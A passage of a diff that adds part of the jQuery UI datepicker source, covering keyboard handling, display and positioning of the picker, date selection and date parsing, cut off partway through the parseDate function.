7486 |
+
|
7487 |
+
/* Redraw the date picker attached to an input field or division.
|
7488 |
+
@param target element - the target input field or division or span */
|
7489 |
+
_refreshDatepicker: function(target) {
|
7490 |
+
var inst = this._getInst(target);
|
7491 |
+
if (inst) {
|
7492 |
+
this._updateDatepicker(inst);
|
7493 |
+
}
|
7494 |
+
},
|
7495 |
+
|
7496 |
+
/* Set the dates for a jQuery selection.
|
7497 |
+
@param target element - the target input field or division or span
|
7498 |
+
@param date Date - the new date */
|
7499 |
+
_setDateDatepicker: function(target, date) {
|
7500 |
+
var inst = this._getInst(target);
|
7501 |
+
if (inst) {
|
7502 |
+
this._setDate(inst, date);
|
7503 |
+
this._updateDatepicker(inst);
|
7504 |
+
this._updateAlternate(inst);
|
7505 |
+
}
|
7506 |
+
},
|
7507 |
+
|
7508 |
+
/* Get the date(s) for the first entry in a jQuery selection.
|
7509 |
+
@param target element - the target input field or division or span
|
7510 |
+
@param noDefault boolean - true if no default date is to be used
|
7511 |
+
@return Date - the current date */
|
7512 |
+
_getDateDatepicker: function(target, noDefault) {
|
7513 |
+
var inst = this._getInst(target);
|
7514 |
+
if (inst && !inst.inline)
|
7515 |
+
this._setDateFromField(inst, noDefault);
|
7516 |
+
return (inst ? this._getDate(inst) : null);
|
7517 |
+
},
|
7518 |
+
|
7519 |
+
/* Handle keystrokes. */
|
7520 |
+
_doKeyDown: function(event) {
|
7521 |
+
var inst = $.datepicker._getInst(event.target);
|
7522 |
+
var handled = true;
|
7523 |
+
var isRTL = inst.dpDiv.is('.ui-datepicker-rtl');
|
7524 |
+
inst._keyEvent = true;
|
7525 |
+
if ($.datepicker._datepickerShowing)
|
7526 |
+
switch (event.keyCode) {
|
7527 |
+
case 9: $.datepicker._hideDatepicker();
|
7528 |
+
handled = false;
|
7529 |
+
break; // hide on tab out
|
7530 |
+
case 13: var sel = $('td.' + $.datepicker._dayOverClass + ':not(.' +
|
7531 |
+
$.datepicker._currentClass + ')', inst.dpDiv);
|
7532 |
+
if (sel[0])
|
7533 |
+
$.datepicker._selectDay(event.target, inst.selectedMonth, inst.selectedYear, sel[0]);
|
7534 |
+
var onSelect = $.datepicker._get(inst, 'onSelect');
|
7535 |
+
if (onSelect) {
|
7536 |
+
var dateStr = $.datepicker._formatDate(inst);
|
7537 |
+
|
7538 |
+
// trigger custom callback
|
7539 |
+
onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]);
|
7540 |
+
}
|
7541 |
+
else
|
7542 |
+
$.datepicker._hideDatepicker();
|
7543 |
+
return false; // don't submit the form
|
7544 |
+
break; // select the value on enter
|
7545 |
+
case 27: $.datepicker._hideDatepicker();
|
7546 |
+
break; // hide on escape
|
7547 |
+
case 33: $.datepicker._adjustDate(event.target, (event.ctrlKey ?
|
7548 |
+
-$.datepicker._get(inst, 'stepBigMonths') :
|
7549 |
+
-$.datepicker._get(inst, 'stepMonths')), 'M');
|
7550 |
+
break; // previous month/year on page up/+ ctrl
|
7551 |
+
case 34: $.datepicker._adjustDate(event.target, (event.ctrlKey ?
|
7552 |
+
+$.datepicker._get(inst, 'stepBigMonths') :
|
7553 |
+
+$.datepicker._get(inst, 'stepMonths')), 'M');
|
7554 |
+
break; // next month/year on page down/+ ctrl
|
7555 |
+
case 35: if (event.ctrlKey || event.metaKey) $.datepicker._clearDate(event.target);
|
7556 |
+
handled = event.ctrlKey || event.metaKey;
|
7557 |
+
break; // clear on ctrl or command +end
|
7558 |
+
case 36: if (event.ctrlKey || event.metaKey) $.datepicker._gotoToday(event.target);
|
7559 |
+
handled = event.ctrlKey || event.metaKey;
|
7560 |
+
break; // current on ctrl or command +home
|
7561 |
+
case 37: if (event.ctrlKey || event.metaKey) $.datepicker._adjustDate(event.target, (isRTL ? +1 : -1), 'D');
|
7562 |
+
handled = event.ctrlKey || event.metaKey;
|
7563 |
+
// -1 day on ctrl or command +left
|
7564 |
+
if (event.originalEvent.altKey) $.datepicker._adjustDate(event.target, (event.ctrlKey ?
|
7565 |
+
-$.datepicker._get(inst, 'stepBigMonths') :
|
7566 |
+
-$.datepicker._get(inst, 'stepMonths')), 'M');
|
7567 |
+
// next month/year on alt +left on Mac
|
7568 |
+
break;
|
7569 |
+
case 38: if (event.ctrlKey || event.metaKey) $.datepicker._adjustDate(event.target, -7, 'D');
|
7570 |
+
handled = event.ctrlKey || event.metaKey;
|
7571 |
+
break; // -1 week on ctrl or command +up
|
7572 |
+
case 39: if (event.ctrlKey || event.metaKey) $.datepicker._adjustDate(event.target, (isRTL ? -1 : +1), 'D');
|
7573 |
+
handled = event.ctrlKey || event.metaKey;
|
7574 |
+
// +1 day on ctrl or command +right
|
7575 |
+
if (event.originalEvent.altKey) $.datepicker._adjustDate(event.target, (event.ctrlKey ?
|
7576 |
+
+$.datepicker._get(inst, 'stepBigMonths') :
|
7577 |
+
+$.datepicker._get(inst, 'stepMonths')), 'M');
|
7578 |
+
// next month/year on alt +right
|
7579 |
+
break;
|
7580 |
+
case 40: if (event.ctrlKey || event.metaKey) $.datepicker._adjustDate(event.target, +7, 'D');
|
7581 |
+
handled = event.ctrlKey || event.metaKey;
|
7582 |
+
break; // +1 week on ctrl or command +down
|
7583 |
+
default: handled = false;
|
7584 |
+
}
|
7585 |
+
else if (event.keyCode == 36 && event.ctrlKey) // display the date picker on ctrl+home
|
7586 |
+
$.datepicker._showDatepicker(this);
|
7587 |
+
else {
|
7588 |
+
handled = false;
|
7589 |
+
}
|
7590 |
+
if (handled) {
|
7591 |
+
event.preventDefault();
|
7592 |
+
event.stopPropagation();
|
7593 |
+
}
|
7594 |
+
},
|
7595 |
+
|
7596 |
+
/* Filter entered characters - based on date format. */
|
7597 |
+
_doKeyPress: function(event) {
|
7598 |
+
var inst = $.datepicker._getInst(event.target);
|
7599 |
+
if ($.datepicker._get(inst, 'constrainInput')) {
|
7600 |
+
var chars = $.datepicker._possibleChars($.datepicker._get(inst, 'dateFormat'));
|
7601 |
+
var chr = String.fromCharCode(event.charCode == undefined ? event.keyCode : event.charCode);
|
7602 |
+
return event.ctrlKey || event.metaKey || (chr < ' ' || !chars || chars.indexOf(chr) > -1);
|
7603 |
+
}
|
7604 |
+
},
|
7605 |
+
|
7606 |
+
/* Synchronise manual entry and field/alternate field. */
|
7607 |
+
_doKeyUp: function(event) {
|
7608 |
+
var inst = $.datepicker._getInst(event.target);
|
7609 |
+
if (inst.input.val() != inst.lastVal) {
|
7610 |
+
try {
|
7611 |
+
var date = $.datepicker.parseDate($.datepicker._get(inst, 'dateFormat'),
|
7612 |
+
(inst.input ? inst.input.val() : null),
|
7613 |
+
$.datepicker._getFormatConfig(inst));
|
7614 |
+
if (date) { // only if valid
|
7615 |
+
$.datepicker._setDateFromField(inst);
|
7616 |
+
$.datepicker._updateAlternate(inst);
|
7617 |
+
$.datepicker._updateDatepicker(inst);
|
7618 |
+
}
|
7619 |
+
}
|
7620 |
+
catch (err) {
|
7621 |
+
$.datepicker.log(err);
|
7622 |
+
}
|
7623 |
+
}
|
7624 |
+
return true;
|
7625 |
+
},
|
7626 |
+
|
7627 |
+
/* Pop-up the date picker for a given input field.
|
7628 |
+
If false returned from beforeShow event handler do not show.
|
7629 |
+
@param input element - the input field attached to the date picker or
|
7630 |
+
event - if triggered by focus */
|
7631 |
+
_showDatepicker: function(input) {
|
7632 |
+
input = input.target || input;
|
7633 |
+
if (input.nodeName.toLowerCase() != 'input') // find from button/image trigger
|
7634 |
+
input = $('input', input.parentNode)[0];
|
7635 |
+
if ($.datepicker._isDisabledDatepicker(input) || $.datepicker._lastInput == input) // already here
|
7636 |
+
return;
|
7637 |
+
var inst = $.datepicker._getInst(input);
|
7638 |
+
if ($.datepicker._curInst && $.datepicker._curInst != inst) {
|
7639 |
+
$.datepicker._curInst.dpDiv.stop(true, true);
|
7640 |
+
if ( inst && $.datepicker._datepickerShowing ) {
|
7641 |
+
$.datepicker._hideDatepicker( $.datepicker._curInst.input[0] );
|
7642 |
+
}
|
7643 |
+
}
|
7644 |
+
var beforeShow = $.datepicker._get(inst, 'beforeShow');
|
7645 |
+
var beforeShowSettings = beforeShow ? beforeShow.apply(input, [input, inst]) : {};
|
7646 |
+
if(beforeShowSettings === false){
|
7647 |
+
//false
|
7648 |
+
return;
|
7649 |
+
}
|
7650 |
+
extendRemove(inst.settings, beforeShowSettings);
|
7651 |
+
inst.lastVal = null;
|
7652 |
+
$.datepicker._lastInput = input;
|
7653 |
+
$.datepicker._setDateFromField(inst);
|
7654 |
+
if ($.datepicker._inDialog) // hide cursor
|
7655 |
+
input.value = '';
|
7656 |
+
if (!$.datepicker._pos) { // position below input
|
7657 |
+
$.datepicker._pos = $.datepicker._findPos(input);
|
7658 |
+
$.datepicker._pos[1] += input.offsetHeight; // add the height
|
7659 |
+
}
|
7660 |
+
var isFixed = false;
|
7661 |
+
$(input).parents().each(function() {
|
7662 |
+
isFixed |= $(this).css('position') == 'fixed';
|
7663 |
+
return !isFixed;
|
7664 |
+
});
|
7665 |
+
if (isFixed && $.browser.opera) { // correction for Opera when fixed and scrolled
|
7666 |
+
$.datepicker._pos[0] -= document.documentElement.scrollLeft;
|
7667 |
+
$.datepicker._pos[1] -= document.documentElement.scrollTop;
|
7668 |
+
}
|
7669 |
+
var offset = {left: $.datepicker._pos[0], top: $.datepicker._pos[1]};
|
7670 |
+
$.datepicker._pos = null;
|
7671 |
+
//to avoid flashes on Firefox
|
7672 |
+
inst.dpDiv.empty();
|
7673 |
+
// determine sizing offscreen
|
7674 |
+
inst.dpDiv.css({position: 'absolute', display: 'block', top: '-1000px'});
|
7675 |
+
$.datepicker._updateDatepicker(inst);
|
7676 |
+
// fix width for dynamic number of date pickers
|
7677 |
+
// and adjust position before showing
|
7678 |
+
offset = $.datepicker._checkOffset(inst, offset, isFixed);
|
7679 |
+
inst.dpDiv.css({position: ($.datepicker._inDialog && $.blockUI ?
|
7680 |
+
'static' : (isFixed ? 'fixed' : 'absolute')), display: 'none',
|
7681 |
+
left: offset.left + 'px', top: offset.top + 'px'});
|
7682 |
+
if (!inst.inline) {
|
7683 |
+
var showAnim = $.datepicker._get(inst, 'showAnim');
|
7684 |
+
var duration = $.datepicker._get(inst, 'duration');
|
7685 |
+
var postProcess = function() {
|
7686 |
+
var cover = inst.dpDiv.find('iframe.ui-datepicker-cover'); // IE6- only
|
7687 |
+
if( !! cover.length ){
|
7688 |
+
var borders = $.datepicker._getBorders(inst.dpDiv);
|
7689 |
+
cover.css({left: -borders[0], top: -borders[1],
|
7690 |
+
width: inst.dpDiv.outerWidth(), height: inst.dpDiv.outerHeight()});
|
7691 |
+
}
|
7692 |
+
};
|
7693 |
+
inst.dpDiv.zIndex($(input).zIndex()+1);
|
7694 |
+
$.datepicker._datepickerShowing = true;
|
7695 |
+
if ($.effects && $.effects[showAnim])
|
7696 |
+
inst.dpDiv.show(showAnim, $.datepicker._get(inst, 'showOptions'), duration, postProcess);
|
7697 |
+
else
|
7698 |
+
inst.dpDiv[showAnim || 'show']((showAnim ? duration : null), postProcess);
|
7699 |
+
if (!showAnim || !duration)
|
7700 |
+
postProcess();
|
7701 |
+
if (inst.input.is(':visible') && !inst.input.is(':disabled'))
|
7702 |
+
inst.input.focus();
|
7703 |
+
$.datepicker._curInst = inst;
|
7704 |
+
}
|
7705 |
+
},
|
7706 |
+
|
7707 |
+
/* Generate the date picker content. */
|
7708 |
+
_updateDatepicker: function(inst) {
|
7709 |
+
var self = this;
|
7710 |
+
self.maxRows = 4; //Reset the max number of rows being displayed (see #7043)
|
7711 |
+
var borders = $.datepicker._getBorders(inst.dpDiv);
|
7712 |
+
instActive = inst; // for delegate hover events
|
7713 |
+
inst.dpDiv.empty().append(this._generateHTML(inst));
|
7714 |
+
var cover = inst.dpDiv.find('iframe.ui-datepicker-cover'); // IE6- only
|
7715 |
+
if( !!cover.length ){ //avoid call to outerXXXX() when not in IE6
|
7716 |
+
cover.css({left: -borders[0], top: -borders[1], width: inst.dpDiv.outerWidth(), height: inst.dpDiv.outerHeight()})
|
7717 |
+
}
|
7718 |
+
inst.dpDiv.find('.' + this._dayOverClass + ' a').mouseover();
|
7719 |
+
var numMonths = this._getNumberOfMonths(inst);
|
7720 |
+
var cols = numMonths[1];
|
7721 |
+
var width = 17;
|
7722 |
+
inst.dpDiv.removeClass('ui-datepicker-multi-2 ui-datepicker-multi-3 ui-datepicker-multi-4').width('');
|
7723 |
+
if (cols > 1)
|
7724 |
+
inst.dpDiv.addClass('ui-datepicker-multi-' + cols).css('width', (width * cols) + 'em');
|
7725 |
+
inst.dpDiv[(numMonths[0] != 1 || numMonths[1] != 1 ? 'add' : 'remove') +
|
7726 |
+
'Class']('ui-datepicker-multi');
|
7727 |
+
inst.dpDiv[(this._get(inst, 'isRTL') ? 'add' : 'remove') +
|
7728 |
+
'Class']('ui-datepicker-rtl');
|
7729 |
+
if (inst == $.datepicker._curInst && $.datepicker._datepickerShowing && inst.input &&
|
7730 |
+
// #6694 - don't focus the input if it's already focused
|
7731 |
+
// this breaks the change event in IE
|
7732 |
+
inst.input.is(':visible') && !inst.input.is(':disabled') && inst.input[0] != document.activeElement)
|
7733 |
+
inst.input.focus();
|
7734 |
+
// deffered render of the years select (to avoid flashes on Firefox)
|
7735 |
+
if( inst.yearshtml ){
|
7736 |
+
var origyearshtml = inst.yearshtml;
|
7737 |
+
setTimeout(function(){
|
7738 |
+
//assure that inst.yearshtml didn't change.
|
7739 |
+
if( origyearshtml === inst.yearshtml && inst.yearshtml ){
|
7740 |
+
inst.dpDiv.find('select.ui-datepicker-year:first').replaceWith(inst.yearshtml);
|
7741 |
+
}
|
7742 |
+
origyearshtml = inst.yearshtml = null;
|
7743 |
+
}, 0);
|
7744 |
+
}
|
7745 |
+
},
|
7746 |
+
|
7747 |
+
/* Retrieve the size of left and top borders for an element.
|
7748 |
+
@param elem (jQuery object) the element of interest
|
7749 |
+
@return (number[2]) the left and top borders */
|
7750 |
+
_getBorders: function(elem) {
|
7751 |
+
var convert = function(value) {
|
7752 |
+
return {thin: 1, medium: 2, thick: 3}[value] || value;
|
7753 |
+
};
|
7754 |
+
return [parseFloat(convert(elem.css('border-left-width'))),
|
7755 |
+
parseFloat(convert(elem.css('border-top-width')))];
|
7756 |
+
},
|
7757 |
+
|
7758 |
+
/* Check positioning to remain on screen. */
|
7759 |
+
_checkOffset: function(inst, offset, isFixed) {
|
7760 |
+
var dpWidth = inst.dpDiv.outerWidth();
|
7761 |
+
var dpHeight = inst.dpDiv.outerHeight();
|
7762 |
+
var inputWidth = inst.input ? inst.input.outerWidth() : 0;
|
7763 |
+
var inputHeight = inst.input ? inst.input.outerHeight() : 0;
|
7764 |
+
var viewWidth = document.documentElement.clientWidth + $(document).scrollLeft();
|
7765 |
+
var viewHeight = document.documentElement.clientHeight + $(document).scrollTop();
|
7766 |
+
|
7767 |
+
offset.left -= (this._get(inst, 'isRTL') ? (dpWidth - inputWidth) : 0);
|
7768 |
+
offset.left -= (isFixed && offset.left == inst.input.offset().left) ? $(document).scrollLeft() : 0;
|
7769 |
+
offset.top -= (isFixed && offset.top == (inst.input.offset().top + inputHeight)) ? $(document).scrollTop() : 0;
|
7770 |
+
|
7771 |
+
// now check if datepicker is showing outside window viewport - move to a better place if so.
|
7772 |
+
offset.left -= Math.min(offset.left, (offset.left + dpWidth > viewWidth && viewWidth > dpWidth) ?
|
7773 |
+
Math.abs(offset.left + dpWidth - viewWidth) : 0);
|
7774 |
+
offset.top -= Math.min(offset.top, (offset.top + dpHeight > viewHeight && viewHeight > dpHeight) ?
|
7775 |
+
Math.abs(dpHeight + inputHeight) : 0);
|
7776 |
+
|
7777 |
+
return offset;
|
7778 |
+
},
|
7779 |
+
|
7780 |
+
/* Find an object's position on the screen. */
|
7781 |
+
_findPos: function(obj) {
|
7782 |
+
var inst = this._getInst(obj);
|
7783 |
+
var isRTL = this._get(inst, 'isRTL');
|
7784 |
+
while (obj && (obj.type == 'hidden' || obj.nodeType != 1 || $.expr.filters.hidden(obj))) {
|
7785 |
+
obj = obj[isRTL ? 'previousSibling' : 'nextSibling'];
|
7786 |
+
}
|
7787 |
+
var position = $(obj).offset();
|
7788 |
+
return [position.left, position.top];
|
7789 |
+
},
|
7790 |
+
|
7791 |
+
/* Hide the date picker from view.
|
7792 |
+
@param input element - the input field attached to the date picker */
|
7793 |
+
_hideDatepicker: function(input) {
|
7794 |
+
var inst = this._curInst;
|
7795 |
+
if (!inst || (input && inst != $.data(input, PROP_NAME)))
|
7796 |
+
return;
|
7797 |
+
if (this._datepickerShowing) {
|
7798 |
+
var showAnim = this._get(inst, 'showAnim');
|
7799 |
+
var duration = this._get(inst, 'duration');
|
7800 |
+
var postProcess = function() {
|
7801 |
+
$.datepicker._tidyDialog(inst);
|
7802 |
+
};
|
7803 |
+
if ($.effects && $.effects[showAnim])
|
7804 |
+
inst.dpDiv.hide(showAnim, $.datepicker._get(inst, 'showOptions'), duration, postProcess);
|
7805 |
+
else
|
7806 |
+
inst.dpDiv[(showAnim == 'slideDown' ? 'slideUp' :
|
7807 |
+
(showAnim == 'fadeIn' ? 'fadeOut' : 'hide'))]((showAnim ? duration : null), postProcess);
|
7808 |
+
if (!showAnim)
|
7809 |
+
postProcess();
|
7810 |
+
this._datepickerShowing = false;
|
7811 |
+
var onClose = this._get(inst, 'onClose');
|
7812 |
+
if (onClose)
|
7813 |
+
onClose.apply((inst.input ? inst.input[0] : null),
|
7814 |
+
[(inst.input ? inst.input.val() : ''), inst]);
|
7815 |
+
this._lastInput = null;
|
7816 |
+
if (this._inDialog) {
|
7817 |
+
this._dialogInput.css({ position: 'absolute', left: '0', top: '-100px' });
|
7818 |
+
if ($.blockUI) {
|
7819 |
+
$.unblockUI();
|
7820 |
+
$('body').append(this.dpDiv);
|
7821 |
+
}
|
7822 |
+
}
|
7823 |
+
this._inDialog = false;
|
7824 |
+
}
|
7825 |
+
},
|
7826 |
+
|
7827 |
+
/* Tidy up after a dialog display. */
|
7828 |
+
_tidyDialog: function(inst) {
|
7829 |
+
inst.dpDiv.removeClass(this._dialogClass).unbind('.ui-datepicker-calendar');
|
7830 |
+
},
|
7831 |
+
|
7832 |
+
/* Close date picker if clicked elsewhere. */
|
7833 |
+
_checkExternalClick: function(event) {
|
7834 |
+
if (!$.datepicker._curInst)
|
7835 |
+
return;
|
7836 |
+
|
7837 |
+
var $target = $(event.target),
|
7838 |
+
inst = $.datepicker._getInst($target[0]);
|
7839 |
+
|
7840 |
+
if ( ( ( $target[0].id != $.datepicker._mainDivId &&
|
7841 |
+
$target.parents('#' + $.datepicker._mainDivId).length == 0 &&
|
7842 |
+
!$target.hasClass($.datepicker.markerClassName) &&
|
7843 |
+
!$target.closest("." + $.datepicker._triggerClass).length &&
|
7844 |
+
$.datepicker._datepickerShowing && !($.datepicker._inDialog && $.blockUI) ) ) ||
|
7845 |
+
( $target.hasClass($.datepicker.markerClassName) && $.datepicker._curInst != inst ) )
|
7846 |
+
$.datepicker._hideDatepicker();
|
7847 |
+
},
|
7848 |
+
|
7849 |
+
/* Adjust one of the date sub-fields. */
|
7850 |
+
_adjustDate: function(id, offset, period) {
|
7851 |
+
var target = $(id);
|
7852 |
+
var inst = this._getInst(target[0]);
|
7853 |
+
if (this._isDisabledDatepicker(target[0])) {
|
7854 |
+
return;
|
7855 |
+
}
|
7856 |
+
this._adjustInstDate(inst, offset +
|
7857 |
+
(period == 'M' ? this._get(inst, 'showCurrentAtPos') : 0), // undo positioning
|
7858 |
+
period);
|
7859 |
+
this._updateDatepicker(inst);
|
7860 |
+
},
|
7861 |
+
|
7862 |
+
/* Action for current link. */
|
7863 |
+
_gotoToday: function(id) {
|
7864 |
+
var target = $(id);
|
7865 |
+
var inst = this._getInst(target[0]);
|
7866 |
+
if (this._get(inst, 'gotoCurrent') && inst.currentDay) {
|
7867 |
+
inst.selectedDay = inst.currentDay;
|
7868 |
+
inst.drawMonth = inst.selectedMonth = inst.currentMonth;
|
7869 |
+
inst.drawYear = inst.selectedYear = inst.currentYear;
|
7870 |
+
}
|
7871 |
+
else {
|
7872 |
+
var date = new Date();
|
7873 |
+
inst.selectedDay = date.getDate();
|
7874 |
+
inst.drawMonth = inst.selectedMonth = date.getMonth();
|
7875 |
+
inst.drawYear = inst.selectedYear = date.getFullYear();
|
7876 |
+
}
|
7877 |
+
this._notifyChange(inst);
|
7878 |
+
this._adjustDate(target);
|
7879 |
+
},
|
7880 |
+
|
7881 |
+
/* Action for selecting a new month/year. */
|
7882 |
+
_selectMonthYear: function(id, select, period) {
|
7883 |
+
var target = $(id);
|
7884 |
+
var inst = this._getInst(target[0]);
|
7885 |
+
inst['selected' + (period == 'M' ? 'Month' : 'Year')] =
|
7886 |
+
inst['draw' + (period == 'M' ? 'Month' : 'Year')] =
|
7887 |
+
parseInt(select.options[select.selectedIndex].value,10);
|
7888 |
+
this._notifyChange(inst);
|
7889 |
+
this._adjustDate(target);
|
7890 |
+
},
|
7891 |
+
|
7892 |
+
/* Action for selecting a day. */
|
7893 |
+
_selectDay: function(id, month, year, td) {
|
7894 |
+
var target = $(id);
|
7895 |
+
if ($(td).hasClass(this._unselectableClass) || this._isDisabledDatepicker(target[0])) {
|
7896 |
+
return;
|
7897 |
+
}
|
7898 |
+
var inst = this._getInst(target[0]);
|
7899 |
+
inst.selectedDay = inst.currentDay = $('a', td).html();
|
7900 |
+
inst.selectedMonth = inst.currentMonth = month;
|
7901 |
+
inst.selectedYear = inst.currentYear = year;
|
7902 |
+
this._selectDate(id, this._formatDate(inst,
|
7903 |
+
inst.currentDay, inst.currentMonth, inst.currentYear));
|
7904 |
+
},
|
7905 |
+
|
7906 |
+
/* Erase the input field and hide the date picker. */
|
7907 |
+
_clearDate: function(id) {
|
7908 |
+
var target = $(id);
|
7909 |
+
var inst = this._getInst(target[0]);
|
7910 |
+
this._selectDate(target, '');
|
7911 |
+
},
|
7912 |
+
|
7913 |
+
/* Update the input field with the selected date. */
|
7914 |
+
_selectDate: function(id, dateStr) {
|
7915 |
+
var target = $(id);
|
7916 |
+
var inst = this._getInst(target[0]);
|
7917 |
+
dateStr = (dateStr != null ? dateStr : this._formatDate(inst));
|
7918 |
+
if (inst.input)
|
7919 |
+
inst.input.val(dateStr);
|
7920 |
+
this._updateAlternate(inst);
|
7921 |
+
var onSelect = this._get(inst, 'onSelect');
|
7922 |
+
if (onSelect)
|
7923 |
+
onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]); // trigger custom callback
|
7924 |
+
else if (inst.input)
|
7925 |
+
inst.input.trigger('change'); // fire the change event
|
7926 |
+
if (inst.inline)
|
7927 |
+
this._updateDatepicker(inst);
|
7928 |
+
else {
|
7929 |
+
this._hideDatepicker();
|
7930 |
+
this._lastInput = inst.input[0];
|
7931 |
+
if (typeof(inst.input[0]) != 'object')
|
7932 |
+
inst.input.focus(); // restore focus
|
7933 |
+
this._lastInput = null;
|
7934 |
+
}
|
7935 |
+
},
|
7936 |
+
|
7937 |
+
/* Update any alternate field to synchronise with the main field. */
|
7938 |
+
_updateAlternate: function(inst) {
|
7939 |
+
var altField = this._get(inst, 'altField');
|
7940 |
+
if (altField) { // update alternate field too
|
7941 |
+
var altFormat = this._get(inst, 'altFormat') || this._get(inst, 'dateFormat');
|
7942 |
+
var date = this._getDate(inst);
|
7943 |
+
var dateStr = this.formatDate(altFormat, date, this._getFormatConfig(inst));
|
7944 |
+
$(altField).each(function() { $(this).val(dateStr); });
|
7945 |
+
}
|
7946 |
+
},
|
7947 |
+
|
7948 |
+
/* Set as beforeShowDay function to prevent selection of weekends.
|
7949 |
+
@param date Date - the date to customise
|
7950 |
+
@return [boolean, string] - is this date selectable?, what is its CSS class? */
|
7951 |
+
noWeekends: function(date) {
|
7952 |
+
var day = date.getDay();
|
7953 |
+
return [(day > 0 && day < 6), ''];
|
7954 |
+
},
|
7955 |
+
|
7956 |
+
/* Set as calculateWeek to determine the week of the year based on the ISO 8601 definition.
|
7957 |
+
@param date Date - the date to get the week for
|
7958 |
+
@return number - the number of the week within the year that contains this date */
|
7959 |
+
iso8601Week: function(date) {
|
7960 |
+
var checkDate = new Date(date.getTime());
|
7961 |
+
// Find Thursday of this week starting on Monday
|
7962 |
+
checkDate.setDate(checkDate.getDate() + 4 - (checkDate.getDay() || 7));
|
7963 |
+
var time = checkDate.getTime();
|
7964 |
+
checkDate.setMonth(0); // Compare with Jan 1
|
7965 |
+
checkDate.setDate(1);
|
7966 |
+
return Math.floor(Math.round((time - checkDate) / 86400000) / 7) + 1;
|
7967 |
+
},
|
7968 |
+
|
7969 |
+
/* Parse a string value into a date object.
|
7970 |
+
See formatDate below for the possible formats.
|
7971 |
+
|
7972 |
+
@param format string - the expected format of the date
|
7973 |
+
@param value string - the date in the above format
|
7974 |
+
@param settings Object - attributes include:
|
7975 |
+
shortYearCutoff number - the cutoff year for determining the century (optional)
|
7976 |
+
dayNamesShort string[7] - abbreviated names of the days from Sunday (optional)
|
7977 |
+
dayNames string[7] - names of the days from Sunday (optional)
|
7978 |
+
monthNamesShort string[12] - abbreviated names of the months (optional)
|
7979 |
+
monthNames string[12] - names of the months (optional)
|
7980 |
+
@return Date - the extracted date value or null if value is blank */
|
7981 |
+
parseDate: function (format, value, settings) {
|
7982 |
+
if (format == null || value == null)
|
7983 |
+
throw 'Invalid arguments';
|
7984 |
+
value = (typeof value == 'object' ? value.toString() : value + '');
|
7985 |
+
if (value == '')
|
7986 |
+
return null;
|
7987 |
+
var shortYearCutoff = (settings ? settings.shortYearCutoff : null) || this._defaults.shortYearCutoff;
|
7988 |
+
shortYearCutoff = (typeof shortYearCutoff != 'string' ? shortYearCutoff :
|
7989 |
+
new Date().getFullYear() % 100 + parseInt(shortYearCutoff, 10));
|
7990 |
+
var dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort;
|
7991 |
+
var dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames;
|
7992 |
+
var monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort;
|
7993 |
+
var monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames;
|
7994 |
+
var year = -1;
|
7995 |
+
var month = -1;
|
7996 |
+
var day = -1;
|
7997 |
+
var doy = -1;
|
7998 |
+
var literal = false;
|
7999 |
+
// Check whether a format character is doubled
|
8000 |
+
var lookAhead = function(match) {
|
8001 |
+
var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) == match);
|
8002 |
+
if (matches)
|
8003 |
+
iFormat++;
|
8004 |
+
return matches;
|
8005 |
+
};
|
8006 |
+
// Extract a number from the string value
|
8007 |
+
var getNumber = function(match) {
|
8008 |
+
var isDoubled = lookAhead(match);
|
8009 |
+
var size = (match == '@' ? 14 : (match == '!' ? 20 :
|
8010 |
+
(match == 'y' && isDoubled ? 4 : (match == 'o' ? 3 : 2))));
|
8011 |
+
var digits = new RegExp('^\\d{1,' + size + '}');
|
8012 |
+
var num = value.substring(iValue).match(digits);
|
8013 |
+
if (!num)
|
8014 |
+
throw 'Missing number at position ' + iValue;
|
8015 |
+
iValue += num[0].length;
|
8016 |
+
return parseInt(num[0], 10);
|
8017 |
+
};
|
8018 |
+
// Extract a name from the string value and convert to an index
|
8019 |
+
var getName = function(match, shortNames, longNames) {
|
8020 |
+
var names = $.map(lookAhead(match) ? longNames : shortNames, function (v, k) {
|
8021 |
+
return [ [k, v] ];
|
8022 |
+
}).sort(function (a, b) {
|
8023 |
+
return -(a[1].length - b[1].length);
|
8024 |
+
});
|
8025 |
+
var index = -1;
|
8026 |
+
$.each(names, function (i, pair) {
|
8027 |
+
var name = pair[1];
|
8028 |
+
if (value.substr(iValue, name.length).toLowerCase() == name.toLowerCase()) {
|
8029 |
+
index = pair[0];
|
8030 |
+
iValue += name.length;
|
8031 |
+
return false;
|
8032 |
+
}
|
8033 |
+
});
|
8034 |
+
if (index != -1)
|
8035 |
+
return index + 1;
|
8036 |
+
else
|
8037 |
+
throw 'Unknown name at position ' + iValue;
|
8038 |
+
};
|
8039 |
+
// Confirm that a literal character matches the string value
|
8040 |
+
var checkLiteral = function() {
|
8041 |
+
if (value.charAt(iValue) != format.charAt(iFormat))
|
8042 |
+
throw 'Unexpected literal at position ' + iValue;
|
8043 |
+
iValue++;
|
8044 |
+
};
|
8045 |
+
var iValue = 0;
|
8046 |
+
for (var iFormat = 0; iFormat < format.length; iFormat++) {
|
8047 |
+
if (literal)
|
8048 |
+
if (format.charAt(iFormat) == "'" && !lookAhead("'"))
|
8049 |
+
literal = false;
|
8050 |
+
else
|
8051 |
+
checkLiteral();
|
8052 |
+
else
|
8053 |
+
switch (format.charAt(iFormat)) {
|
8054 |
+
case 'd':
|
8055 |
+
day = getNumber('d');
|
8056 |
+
break;
|
8057 |
+
case 'D':
|
8058 |
+
getName('D', dayNamesShort, dayNames);
|
8059 |
+
break;
|
8060 |
+
case 'o':
|
8061 |
+
doy = getNumber('o');
|
8062 |
+
break;
|
8063 |
+
case 'm':
|
8064 |
+
month = getNumber('m');
|
8065 |
+
break;
|
8066 |
+
case 'M':
|
8067 |
+
month = getName('M', monthNamesShort, monthNames);
|
8068 |
+
break;
|
8069 |
+
case 'y':
|
8070 |
+
year = getNumber('y');
|
8071 |
+
break;
|
8072 |
+
case '@':
|
8073 |
+
var date = new Date(getNumber('@'));
|
8074 |
+
year = date.getFullYear();
|
8075 |
+
month = date.getMonth() + 1;
|
8076 |
+
day = date.getDate();
|
8077 |
+
break;
|
8078 |
+
case '!':
|
8079 |
+
var date = new Date((getNumber('!') - this._ticksTo1970) / 10000);
|
8080 |
+
year = date.getFullYear();
|
8081 |
+
month = date.getMonth() + 1;
|
8082 |
+
day = date.getDate();
|
8083 |
+
break;
